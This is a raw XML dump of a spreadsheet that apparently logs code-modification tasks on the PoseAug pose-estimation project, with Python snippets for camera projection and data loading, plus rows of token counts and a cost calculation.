File 2: PoseAug/common/camera.py\nfrom __future__ import absolute_import, division\n\nimport numpy as np\nimport torch\n\nfrom utils.utils import wrap\nfrom common.quaternion import qrot, qinverse, qrot_batch  #Modify: Import new batch processing function\n\n\ndef normalize_screen_coordinates(X, w, h):\n    assert X.shape[-1] == 2\n\n    # Normalize so that [0, w] is mapped to [-1, 1], while preserving the aspect ratio\n    return X / w * 2 - [1, h / w]\n\n\ndef image_coordinates(X, w, h):\n    assert X.shape[-1] == 2\n\n    # Reverse camera frame normalization\n    return (X + [1, h / w]) * w / 2\n\n\ndef world_to_camera(X, R, t):\n    Rt = wrap(qinverse, False, R)  # Invert rotation\n    return wrap(qrot, False, np.tile(Rt, X.shape[:-1] + (1,)), X - t)  # Rotate and translate\n\n\n#New: Batch processing version for efficient camera transformation\ndef world_to_camera_batch(X_batch, R_batch, t_batch):\n    """\n    Batch process world to camera transformations.\n    X_batch: (batch_size, *, 3)\n    R_batch: (batch_size, 4) quaternion rotations\n    t_batch: (batch_size, 3) translations\n    """\n    Rt_batch = torch.stack([qinverse(R_batch[i], inplace=False) for i in range(R_batch.shape[0])], dim=0)\n    X_translated = X_batch - t_batch.unsqueeze(1) if len(X_batch.shape) &gt; 2 else X_batch - t_batch\n    return qrot_batch(Rt_batch.unsqueeze(1).expand_as(X_batch[..., :4]) if len(X_batch.shape) &gt; 2 else Rt_batch.unsqueeze(0), X_translated)\n\n\ndef camera_to_world(X, R, t):\n    return wrap(qrot, False, np.tile(R, X.shape[:-1] + (1,)), X) + t\n\n\n#New: Batch processing version for efficient inverse camera transformation\ndef camera_to_world_batch(X_batch, R_batch, t_batch):\n    """\n    Batch process camera to world transformations.\n    X_batch: (batch_size, *, 3)\n    R_batch: (batch_size, 4) quaternion rotations\n    t_batch: (batch_size, 3) translations\n    """\n    rotated = qrot_batch(R_batch.unsqueeze(1).expand_as(X_batch[..., :4]) if len(X_batch.shape) &gt; 2 else R_batch.unsqueeze(0), X_batch)\n    return rotated + t_batch.unsqueeze(1) if len(X_batch.shape) &gt; 2 else rotated + t_batch\n\n\ndef project_to_2d(X, camera_params):\n    """\n    Project 3D points to 2D using the Human3.6M camera projection function.\n    This is a differentiable and batched reimplementation of the original MATLAB script.\n\n    Arguments:\n    X -- 3D points in *camera space* to transform (N, *, 3)\n    camera_params -- intrinsic parameteres (N, 2+2+3+2=9)\n    """\n    assert X.shape[-1] == 3\n    assert len(camera_params.shape) == 2\n    assert camera_params.shape[-1] == 9\n    assert X.shape[0] == camera_params.shape[0]\n\n    while len(camera_params.shape) &lt; len(X.shape):\n        camera_params = camera_params.unsqueeze(1)\n\n    f = camera_params[..., :2]\n    c = camera_params[..., 2:4]\n    k = camera_params[..., 4:7]\n    p = camera_params[..., 7:]\n\n    XX = torch.clamp(X[..., :2] / X[..., 2:], min=-1, max=1)\n    r2 = torch.sum(XX[..., :2] ** 2, dim=len(XX.shape) - 1, keepdim=True)\n\n    radial = 1 + torch.sum(k * torch.cat((r2, r2 ** 2, r2 ** 3), dim=len(r2.shape) - 1), dim=len(r2.shape) - 1,\n                           keepdim=True)\n    tan = torch.sum(p * XX, dim=len(XX.shape) - 1, keepdim=True)\n\n    XXX = XX * (radial + tan) + p * r2\n\n    return f * XXX + c\n\n\ndef project_to_2d_linear(X, camera_params):\n    """\n    Project 3D points to 2D using only linear parameters (focal length and principal point).\n\n    Arguments:\n    X -- 3D points in *camera space* to transform (N, *, 3)\n    camera_params -- intrinsic parameteres (N, 2+2+3+2=9)\n    """\n    assert X.shape[-1] == 3\n    assert len(camera_params.shape) == 2\n    assert camera_params.shape[-1] == 9\n    assert X.shape[0] == camera_params.shape[0]\n\n    while len(camera_params.shape) &lt; len(X.shape):\n        camera_params = camera_params.unsqueeze(1)\n\n    f = camera_params[..., :2]\n    c = camera_params[..., 2:4]\n\n    XX = torch.clamp(X[..., :2] / X[..., 2:], min=-1, max=1)\n\n    return f * XX + c'}</t>
  </si>
  <si>
    <t>{'#file 1': '#Modify\ndef qrot(q, v):\n    """\n    Rotate vector(s) v about the rotation described by quaternion(s) q.\n    Expects a tensor of shape (*, 4) for q and a tensor of shape (*, 3) for v,\n    where * denotes any number of dimensions.\n    Returns a tensor of shape (*, 3).\n    """\n    assert q.shape[-1] == 4\n    assert v.shape[-1] == 3\n    assert q.shape[:-1] == v.shape[:-1]\n\n    qvec = q[..., 1:]\n    uv = torch.cross(qvec, v, dim=len(q.shape) - 1)\n    uuv = torch.cross(qvec, uv, dim=len(q.shape) - 1)\n    return v + 2 * (q[..., :1] * uv + uuv)', '#file 2': '#Modify\ndef world_to_camera(X, R, t):\n    Rt = wrap(qinverse, False, R)  # Invert rotation\n    return wrap(qrot, False, np.tile(Rt, X.shape[:-1] + (1,)), X - t)  # Rotate and translate', '#file 3': "#Modify\ndef fetch(subjects, dataset, keypoints, action_filter=None, downsample=1):\n    out_poses_3d = []\n    out_poses_2d = []\n    out_actions = []\n    out_cams = []\n\n    for subject in subjects:\n        for action in dataset[subject].keys():\n            if action_filter is not None:\n                if action not in action_filter:\n                    continue\n            poses_2d = keypoints[subject][action]\n            for i in range(len(poses_2d)):  # Iterate across cameras\n                out_poses_2d.append(poses_2d[i])\n                out_actions.append(action)\n                out_cams.append(dataset.cameras()[subject][i])\n\n            poses_3d = dataset[subject][action]['positions']\n            poses_3d = world_to_camera(poses_3d, R=out_cams[-1]['orientation'], t=out_cams[-1]['translation'])\n            poses_3d[:, :, :] -= poses_3d[:, :1, :]  # Remove global offset\n            out_poses_3d.append(poses_3d)\n\n    return out_poses_3d, out_poses_2d, out_actions, out_cams", '#file 4': "#Modify\ndef data_preparation(args):\n    dataset_path = path.join('data', 'data_3d_' + args.dataset + '.npz')\n    if args.dataset == 'h36m':\n        from common.h36m_dataset import Human36mDataset, TEST_SUBJECTS\n        dataset = Human36mDataset(dataset_path)\n        if args.s1only:\n            subjects_train = ['S1']\n        else:\n            subjects_train = ['S1', 'S5', 'S6', 'S7', 'S8']\n        subjects_test = TEST_SUBJECTS\n    else:\n        raise KeyError('Invalid dataset')\n\n    print('==&gt; Loading 3D data...')\n    dataset = read_3d_data(dataset)\n\n    print('==&gt; Loading 2D detections...')\n    keypoints = create_2d_data(path.join('data', 'data_2d_' + args.dataset + '_' + args.keypoints + '.npz'), dataset)\n\n    action_filter = None if args.actions == '*' else args.actions.split(',')\n    if action_filter is not None:\n        action_filter = map(lambda x: dataset.define_actions(x)[0], action_filter)\n        print('==&gt; Selected actions: {}'.format(action_filter))\n\n    stride = args.downsample\n\n    poses_train, poses_train_2d, actions_train, cams_train = fetch(subjects_train, dataset, keypoints, action_filter, stride)\n    poses_valid, poses_valid_2d, actions_valid, cams_valid = fetch(subjects_test, dataset, keypoints, action_filter, stride)\n\n    train_det2d3d_loader = DataLoader(PoseDataSet(poses_train, poses_train_2d, actions_train, cams_train), batch_size=args.batch_size, shuffle=True, num_workers=args.num_workers, pin_memory=True)\n    train_gt2d3d_loader = DataLoader(PoseDataSet(poses_train, poses_train_2d, actions_train, cams_train), batch_size=args.batch_size, shuffle=True, num_workers=args.num_workers, pin_memory=True)\n    valid_loader = DataLoader(PoseDataSet(poses_valid, poses_valid_2d, actions_valid, cams_valid), batch_size=args.batch_size, shuffle=False, num_workers=args.num_workers, pin_memory=True)\n\n    target_2d_loader = DataLoader(PoseTarget(poses_train_2d), batch_size=args.batch_size, shuffle=True, num_workers=args.num_workers, pin_memory=True)\n    target_3d_loader = DataLoader(PoseTarget(poses_train), batch_size=args.batch_size, shuffle=True, num_workers=args.num_workers, pin_memory=True)\n\n    mpi3d_npz = np.load('data_extra/test_set/test_3dhp.npz')\n    tmp = mpi3d_npz\n    mpi3d_loader = DataLoader(PoseBuffer([tmp['pose3d']], [tmp['pose2d']]), batch_size=args.batch_size, shuffle=False, num_workers=args.num_workers, pin_memory=True)\n\n    return {\n        'dataset': dataset,\n        'train_det2d3d_loader': train_det2d3d_loader,\n        'train_gt2d3d_loader': train_gt2d3d_loader,\n        'target_2d_loader': target_2d_loader,\n        'target_3d_loader': target_3d_loader,\n        'H36M_test': valid_loader,\n        'mpi3d_loader': mpi3d_loader,\n        'action_filter': action_filter,\n        'subjects_test': subjects_test,\n        'keypoints': keypoints,\n    }"}</t>
  </si>
  <si>
    <t>avg input tokens</t>
  </si>
  <si>
    <t>avg output tokens</t>
  </si>
  <si>
    <t>cost</t>
  </si>
  <si>
    <t>cost haiku input</t>
  </si>
  <si>
    <t>cost haiku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</si>
</sst>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8"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <selection activeCell="I17" sqref="I17"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="8.83203125" defaultRowHeight="15" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="4" max="4" width="10.6640625" customWidth="1"/>
    <col min="11" max="12" width="9.1640625" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1" s="1" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="1" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="1" t="s">
        <v>2</v>
      </c>
      <c r="D1" s="1" t="s">
        <v>3</v>
      </c>
      <c r="E1" s="1" t="s">
        <v>4</v>
      </c>
      <c r="F1" s="1" t="s">
        <v>5</v>
      </c>
      <c r="H1" s="2" t="s">
        <v>438</v>
      </c>
      <c r="I1" s="2" t="s">
        <v>439</v>
      </c>
      <c r="K1" s="3" t="s">
        <v>440</v>
      </c>
    </row>
    <row r="2" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A2">
        <v>0</v>
      </c>
      <c r="B2" t="s">
        <v>6</v>
      </c>
      <c r="C2" t="s">
        <v>7</v>
      </c>
      <c r="D2">
        <v>2942</v>
      </c>
      <c r="E2">
        <v>1152</v>
      </c>
      <c r="F2">
        <v>4094</v>
      </c>
      <c r="H2">
        <f>AVERAGE(D:D)</f>
        <v>6457.8202764976959</v>
      </c>
      <c r="I2">
        <f>AVERAGE(E:E)</f>
        <v>2502.0046082949307</v>
      </c>
      <c r="K2">
        <f>H2*K6+I2*L6</f>
        <v>1.8967843317972348E-2</v>
      </c>
    </row>
    <row r="3" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A3">
        <v>1</v>
      </c>
      <c r="B3" t="s">
        <v>8</v>
      </c>
      <c r="C3" t="s">
        <v>9</v>
      </c>
      <c r="D3">
        <v>2315</v>
      </c>
      <c r="E3">
        <v>2293</v>
      </c>
      <c r="F3">
        <v>4608</v>
      </c>
    </row>
    <row r="4" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A4">
        <v>2</v>
      </c>
      <c r="B4" t="s">
        <v>10</v>
      </c>
      <c r="C4" t="s">
        <v>11</v>
      </c>
      <c r="D4">
        <v>3009</v>
      </c>
      <c r="E4">
        <v>3078</v>
      </c>
      <c r="F4">
        <v>6087</v>
      </c>
    </row>
    <row r="5" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A5">
        <v>3</v>
      </c>
      <c r="B5" t="s">
        <v>12</v>
      </c>
      <c r="C5" t="s">
        <v>13</v>
      </c>
      <c r="D5">
        <v>25837</v>
      </c>
      <c r="E5">
        <v>1272</v>
      </c>
      <c r="F5">
        <v>27109</v>
      </c>
      <c r="K5" t="s">
        <v>441</v>
      </c>
      <c r="L5" t="s">
        <v>442</v>
      </c>
    </row>
    <row r="6" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A6">
        <v>4</v>
      </c>
      <c r="B6" t="s">
        <v>14</v>
      </c>
      <c r="C6" t="s">
        <v>15</v>
      </c>
      <c r="D6">
        <v>2467</v>
      </c>
      <c r="E6">
        <v>902</v>
      </c>
      <c r="F6">
        <v>3369</v>
      </c>
      <c r="K6">
        <f>1/1000000</f>
        <v>9.9999999999999995E-7</v>
      </c>
      <c r="L6">
        <f>5/1000000</f>
        <v>5.0000000000000004E-6</v>
      </c>
    </row>
    <row r="7" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A7">
        <v>5</v>
      </c>
      <c r="B7" t="s">
        <v>16</v>
      </c>
      <c r="C7" t="s">
        <v>17</v>
      </c>
      <c r="D7">
        <v>1117</v>
      </c>
      <c r="E7">
        <v>908</v>
      </c>
      <c r="F7">
        <v>2025</v>
      </c>
    </row>
    <row r="8" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A8">
        <v>6</v>
      </c>
      <c r="B8" t="s">
        <v>18</v>
      </c>
      <c r="C8" t="s">
        <v>19</v>
      </c>
      <c r="D8">
        <v>3855</v>
      </c>
      <c r="E8">
        <v>2294</v>
      </c>
      <c r="F8">
        <v>6149</v>
      </c>
    </row>
    <row r="9" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A9">
        <v>7</v>
      </c>
      <c r="B9" t="s">
        <v>20</v>
      </c>
      <c r="C9" t="s">
        <v>21</v>
      </c>
      <c r="D9">
        <v>14628</v>
      </c>
      <c r="E9">
        <v>1215</v>
      </c>
      <c r="F9">
        <v>15843</v>
      </c>
    </row>
    <row r="10" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A10">
        <v>8</v>
      </c>
      <c r="B10" t="s">
        <v>22</v>
      </c>
      <c r="C10" t="s">
        <v>23</v>
      </c>
      <c r="D10">
        <v>4248</v>
      </c>
      <c r="E10">
        <v>1393</v>
      </c>
      <c r="F10">
        <v>5641</v>
      </c>
    </row>
    <row r="11" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A11">
        <v>9</v>
      </c>
      <c r="B11" t="s">
        <v>24</v>
      </c>
      <c r="C11" t="s">
        <v>25</v>
      </c>
      <c r="D11">
        <v>8166</v>
      </c>
      <c r="E11">
        <v>1283</v>
      </c>
      <c r="F11">
        <v>9449</v>
      </c>
    </row>
    <row r="12" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A12">
        <v>10</v>
      </c>
      <c r="B12" t="s">
        <v>26</v>
      </c>
      <c r="C12" t="s">
        <v>27</v>
      </c>
      <c r="D12">
        <v>3400</v>
      </c>
      <c r="E12">
        <v>4268</v>
      </c>
      <c r="F12">
        <v>7668</v>
      </c>
    </row>
    <row r="13" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A13">
        <v>11</v>
      </c>
      <c r="B13" t="s">
        <v>28</v>
      </c>
      <c r="C13" t="s">
        <v>29</v>
      </c>
      <c r="D13">
        <v>6301</v>
      </c>
      <c r="E13">
        <v>1075</v>
      </c>
      <c r="F13">
        <v>7376</v>
      </c>
    </row>
    <row r="14" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A14">
        <v>12</v>
      </c>
      <c r="B14" t="s">
        <v>30</v>
      </c>
      <c r="C14" t="s">
        <v>31</v>
      </c>
      <c r="D14">
        <v>2535</v>
      </c>
      <c r="E14">
        <v>2901</v>
      </c>
      <c r="F14">
        <v>5436</v>
      </c>
    </row>
    <row r="15" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A15">
        <v>13</v>
      </c>
      <c r="B15" t="s">
        <v>32</v>
      </c>
      <c r="C15" t="s">
        <v>33</v>
      </c>
      <c r="D15">
        <v>2086</v>
      </c>
      <c r="E15">
        <v>1895</v>
      </c>
      <c r="F15">
        <v>3981</v>
      </c>
    </row>
    <row r="16" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A16">
        <v>14</v>
      </c>
      <c r="B16" t="s">
        <v>34</v>
      </c>
      <c r="C16" t="s">
        <v>35</v>
      </c>
      <c r="D16">
        <v>4140</v>
      </c>
      <c r="E16">
        <v>2733</v>
      </c>
      <c r="F16">
        <v>6873</v>
      </c>
    </row>
    <row r="17" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A17">
        <v>15</v>
      </c>
      <c r="B17" t="s">
        <v>36</v>
      </c>
      <c r="C17" t="s">
        <v>37</v>
      </c>
      <c r="D17">
        <v>2339</v>
      </c>
      <c r="E17">
        <v>755</v>
      </c>
      <c r="F17">
        <v>3094</v>
      </c>
    </row>
    <row r="18" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A18">
        <v>16</v>
      </c>
      <c r="B18" t="s">
        <v>38</v>
      </c>
      <c r="C18" t="s">
        <v>39</v>
      </c>
      <c r="D18">
        <v>1513</v>
      </c>
      <c r="E18">
        <v>1357</v>
      </c>
      <c r="F18">
        <v>2870</v>
      </c>
    </row>
    <row r="19" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A19">
        <v>17</v>
      </c>
      <c r="B19" t="s">
        <v>40</v>
      </c>
      <c r="C19" t="s">
        <v>41</v>
      </c>
      <c r="D19">
        <v>3641</v>
      </c>
      <c r="E19">
        <v>1520</v>
      </c>
      <c r="F19">
        <v>5161</v>
      </c>
    </row>
    <row r="20" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A20">
        <v>18</v>
      </c>
      <c r="B20" t="s">
        <v>42</v>
      </c>
      <c r="C20" t="s">
        <v>43</v>
      </c>
      <c r="D20">
        <v>1116</v>
      </c>
      <c r="E20">
        <v>922</v>
      </c>
      <c r="F20">
        <v>2038</v>
      </c>
    </row>
    <row r="21" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A21">
        <v>19</v>
      </c>
      <c r="B21" t="s">
        <v>44</v>
      </c>
      <c r="C21" t="s">
        <v>45</v>
      </c>
      <c r="D21">
        <v>16604</v>
      </c>
      <c r="E21">
        <v>1876</v>
      </c>
      <c r="F21">
        <v>18480</v>
      </c>
    </row>
    <row r="22" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A22">
        <v>20</v>
      </c>
      <c r="B22" t="s">
        <v>46</v>
      </c>
      <c r="C22" t="s">
        <v>47</v>
      </c>
      <c r="D22">
        <v>3643</v>
      </c>
      <c r="E22">
        <v>1498</v>
      </c>
      <c r="F22">
        <v>5141</v>
      </c>
    </row>
    <row r="23" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A23">
        <v>21</v>
      </c>
      <c r="B23" t="s">
        <v>48</v>
      </c>
      <c r="C23" t="s">
        <v>49</v>
      </c>
      <c r="D23">
        <v>16126</v>
      </c>
      <c r="E23">
        <v>4900</v>
      </c>
      <c r="F23">
        <v>21026</v>
      </c>
    </row>
    <row r="24" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A24">
        <v>22</v>
      </c>
      <c r="B24" t="s">
        <v>50</v>
      </c>
      <c r="C24" t="s">
        <v>51</v>
      </c>
      <c r="D24">
        <v>3364</v>
      </c>
      <c r="E24">
        <v>1726</v>
      </c>
      <c r="F24">
        <v>5090</v>
      </c>
    </row>
    <row r="25" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A25">
        <v>23</v>
      </c>
      <c r="B25" t="s">
        <v>52</v>
      </c>
      <c r="C25" t="s">
        <v>53</v>
      </c>
      <c r="D25">
        <v>4871</v>
      </c>
      <c r="E25">
        <v>4930</v>
      </c>
      <c r="F25">
        <v>9801</v>
      </c>
    </row>
    <row r="26" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A26">
        <v>24</v>
      </c>
      <c r="B26" t="s">
        <v>54</v>
      </c>
      <c r="C26" t="s">
        <v>55</v>
      </c>
      <c r="D26">
        <v>2540</v>
      </c>
      <c r="E26">
        <v>1060</v>
      </c>
      <c r="F26">
        <v>3600</v>
      </c>
    </row>
    <row r="27" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A27">
        <v>25</v>
      </c>
      <c r="B27" t="s">
        <v>56</v>
      </c>
      <c r="C27" t="s">
        <v>57</v>
      </c>
      <c r="D27">
        <v>2224</v>
      </c>
      <c r="E27">
        <v>1888</v>
      </c>
      <c r="F27">
        <v>4112</v>
      </c>
    </row>
    <row r="28" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A28">
        <v>26</v>
      </c>
      <c r="B28" t="s">
        <v>58</v>
      </c>
      <c r="C28" t="s">
        <v>59</v>
      </c>
      <c r="D28">
        <v>2117</v>
      </c>
      <c r="E28">
        <v>1963</v>
      </c>
      <c r="F28">
        <v>4080</v>
      </c>
    </row>
    <row r="29" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A29">
        <v>27</v>
      </c>
      <c r="B29" t="s">
        <v>60</v>
      </c>
      <c r="C29" t="s">
        <v>61</v>
      </c>
      <c r="D29">
        <v>2603</v>
      </c>
      <c r="E29">
        <v>1290</v>
      </c>
      <c r="F29">
        <v>3893</v>
      </c>
    </row>
    <row r="30" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A30">
        <v>28</v>
      </c>
      <c r="B30" t="s">
        <v>62</v>
      </c>
      <c r="C30" t="s">
        <v>63</v>
      </c>
      <c r="D30">
        <v>1072</v>
      </c>
      <c r="E30">
        <v>818</v>
      </c>
      <c r="F30">
        <v>1890</v>
      </c>
    </row>
    <row r="31" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A31">
        <v>29</v>
      </c>
      <c r="B31" t="s">
        <v>64</v>
      </c>
      <c r="C31" t="s">
        <v>65</v>
      </c>
      <c r="D31">
        <v>2329</v>
      </c>
      <c r="E31">
        <v>2681</v>
      </c>
      <c r="F31">
        <v>5010</v>
      </c>
    </row>
    <row r="32" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A32">
        <v>30</v>
      </c>
      <c r="B32" t="s">
        <v>66</v>
      </c>
      <c r="C32" t="s">
        <v>67</v>
      </c>
      <c r="D32">
        <v>2512</v>
      </c>
      <c r="E32">
        <v>2888</v>
      </c>
      <c r="F32">
        <v>5400</v>
      </c>
    </row>
    <row r="33" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A33">
        <v>31</v>
      </c>
      <c r="B33" t="s">
        <v>68</v>
      </c>
      <c r="C33" t="s">
        <v>69</v>
      </c>
      <c r="D33">
        <v>1996</v>
      </c>
      <c r="E33">
        <v>1452</v>
      </c>
      <c r="F33">
        <v>3448</v>
      </c>
    </row>
    <row r="34" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A34">
        <v>32</v>
      </c>
      <c r="B34" t="s">
        <v>70</v>
      </c>
      <c r="C34" t="s">
        <v>71</v>
      </c>
      <c r="D34">
        <v>2179</v>
      </c>
      <c r="E34">
        <v>2174</v>
      </c>
      <c r="F34">
        <v>4353</v>
      </c>
    </row>
    <row r="35" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A35">
        <v>33</v>
      </c>
      <c r="B35" t="s">
        <v>72</v>
      </c>
      <c r="C35" t="s">
        <v>73</v>
      </c>
      <c r="D35">
        <v>3359</v>
      </c>
      <c r="E35">
        <v>3405</v>
      </c>
      <c r="F35">
        <v>6764</v>
      </c>
    </row>
    <row r="36" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A36">
        <v>34</v>
      </c>
      <c r="B36" t="s">
        <v>74</v>
      </c>
      <c r="C36" t="s">
        <v>75</v>
      </c>
      <c r="D36">
        <v>2532</v>
      </c>
      <c r="E36">
        <v>2543</v>
      </c>
      <c r="F36">
        <v>5075</v>
      </c>
    </row>
    <row r="37" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A37">
        <v>35</v>
      </c>
      <c r="B37" t="s">
        <v>76</v>
      </c>
      <c r="C37" t="s">
        <v>77</v>
      </c>
      <c r="D37">
        <v>7329</v>
      </c>
      <c r="E37">
        <v>1402</v>
      </c>
      <c r="F37">
        <v>8731</v>
      </c>
    </row>
    <row r="38" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A38">
        <v>36</v>
      </c>
      <c r="B38" t="s">
        <v>78</v>
      </c>
      <c r="C38" t="s">
        <v>79</v>
      </c>
      <c r="D38">
        <v>2979</v>
      </c>
      <c r="E38">
        <v>3368</v>
      </c>
      <c r="F38">
        <v>6347</v>
      </c>
    </row>
    <row r="39" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A39">
        <v>37</v>
      </c>
      <c r="B39" t="s">
        <v>80</v>
      </c>
      <c r="C39" t="s">
        <v>81</v>
      </c>
      <c r="D39">
        <v>2798</v>
      </c>
      <c r="E39">
        <v>2670</v>
      </c>
      <c r="F39">
        <v>5468</v>
      </c>
    </row>
    <row r="40" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A40">
        <v>38</v>
      </c>
      <c r="B40" t="s">
        <v>82</v>
      </c>
      <c r="C40" t="s">
        <v>83</v>
      </c>
      <c r="D40">
        <v>4350</v>
      </c>
      <c r="E40">
        <v>1098</v>
      </c>
      <c r="F40">
        <v>5448</v>
      </c>
    </row>
    <row r="41" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A41">
        <v>39</v>
      </c>
      <c r="B41" t="s">
        <v>84</v>
      </c>
      <c r="C41" t="s">
        <v>85</v>
      </c>
      <c r="D41">
        <v>19112</v>
      </c>
      <c r="E41">
        <v>4542</v>
      </c>
      <c r="F41">
        <v>23654</v>
      </c>
    </row>
    <row r="42" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A42">
        <v>40</v>
      </c>
      <c r="B42" t="s">
        <v>86</v>
      </c>
      <c r="C42" t="s">
        <v>87</v>
      </c>
      <c r="D42">
        <v>22485</v>
      </c>
      <c r="E42">
        <v>2661</v>
      </c>
      <c r="F42">
        <v>25146</v>
      </c>
    </row>
    <row r="43" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A43">
        <v>41</v>
      </c>
      <c r="B43" t="s">
        <v>88</v>
      </c>
      <c r="C43" t="s">
        <v>89</v>
      </c>
      <c r="D43">
        <v>1555</v>
      </c>
      <c r="E43">
        <v>1246</v>
      </c>
      <c r="F43">
        <v>2801</v>
      </c>
    </row>
    <row r="44" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A44">
        <v>42</v>
      </c>
      <c r="B44" t="s">
        <v>90</v>
      </c>
      <c r="C44" t="s">
        <v>91</v>
      </c>
      <c r="D44">
        <v>1198</v>
      </c>
      <c r="E44">
        <v>983</v>
      </c>
      <c r="F44">
        <v>2181</v>
      </c>
    </row>
    <row r="45" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A45">
        <v>43</v>
      </c>
      <c r="B45" t="s">
        <v>92</v>
      </c>
      <c r="C45" t="s">
        <v>93</v>
      </c>
      <c r="D45">
        <v>797</v>
      </c>
      <c r="E45">
        <v>537</v>
      </c>
      <c r="F45">
        <v>1334</v>
      </c>
    </row>
    <row r="46" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A46">
        <v>44</v>
      </c>
      <c r="B46" t="s">
        <v>94</v>
      </c>
      <c r="C46" t="s">
        <v>95</v>
      </c>
      <c r="D46">
        <v>1419</v>
      </c>
      <c r="E46">
        <v>1379</v>
      </c>
      <c r="F46">
        <v>2798</v>
      </c>
    </row>
    <row r="47" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A47">
        <v>45</v>
      </c>
      <c r="B47" t="s">
        <v>96</v>
      </c>
      <c r="C47" t="s">
        <v>97</v>
      </c>
      <c r="D47">
        <v>3804</v>
      </c>
      <c r="E47">
        <v>4496</v>
      </c>
      <c r="F47">
        <v>8300</v>
      </c>
    </row>
    <row r="48" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A48">
        <v>46</v>
      </c>
      <c r="B48" t="s">
        <v>98</v>
      </c>
      <c r="C48" t="s">
        <v>99</v>
      </c>
      <c r="D48">
        <v>4052</v>
      </c>
      <c r="E48">
        <v>1353</v>
      </c>
      <c r="F48">
        <v>5405</v>
      </c>
    </row>
    <row r="49" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A49">
        <v>47</v>
      </c>
      <c r="B49" t="s">
        <v>100</v>
      </c>
      <c r="C49" t="s">
        <v>101</v>
      </c>
      <c r="D49">
        <v>3762</v>
      </c>
      <c r="E49">
        <v>3964</v>
      </c>
      <c r="F49">
        <v>7726</v>
      </c>
    </row>
    <row r="50" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A50">
        <v>48</v>
      </c>
      <c r="B50" t="s">
        <v>102</v>
      </c>
      <c r="C50" t="s">
        <v>103</v>
      </c>
      <c r="D50">
        <v>2340</v>
      </c>
      <c r="E50">
        <v>1879</v>
      </c>
      <c r="F50">
        <v>4219</v>
      </c>
    </row>
    <row r="51" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A51">
        <v>49</v>
      </c>
      <c r="B51" t="s">
        <v>104</v>
      </c>
      <c r="C51" t="s">
        <v>105</v>
      </c>
      <c r="D51">
        <v>6701</v>
      </c>
      <c r="E51">
        <v>4028</v>
      </c>
      <c r="F51">
        <v>10729</v>
      </c>
    </row>
    <row r="52" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A52">
        <v>50</v>
      </c>
      <c r="B52" t="s">
        <v>106</v>
      </c>
      <c r="C52" t="s">
        <v>107</v>
      </c>
      <c r="D52">
        <v>2691</v>
      </c>
      <c r="E52">
        <v>2756</v>
      </c>
      <c r="F52">
        <v>5447</v>
      </c>
    </row>
    <row r="53" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A53">
        <v>51</v>
      </c>
      <c r="B53" t="s">
        <v>108</v>
      </c>
      <c r="C53" t="s">
        <v>109</v>
      </c>
      <c r="D53">
        <v>4775</v>
      </c>
      <c r="E53">
        <v>1580</v>
      </c>
      <c r="F53">
        <v>6355</v>
      </c>
    </row>
    <row r="54" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A54">
        <v>52</v>
      </c>
      <c r="B54" t="s">
        <v>110</v>
      </c>
      <c r="C54" t="s">
        <v>111</v>
      </c>
      <c r="D54">
        <v>35775</v>
      </c>
      <c r="E54">
        <v>4026</v>
      </c>
      <c r="F54">
        <v>39801</v>
      </c>
    </row>
    <row r="55" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A55">
        <v>53</v>
      </c>
      <c r="B55" t="s">
        <v>112</v>
      </c>
      <c r="C55" t="s">
        <v>113</v>
      </c>
      <c r="D55">
        <v>4047</v>
      </c>
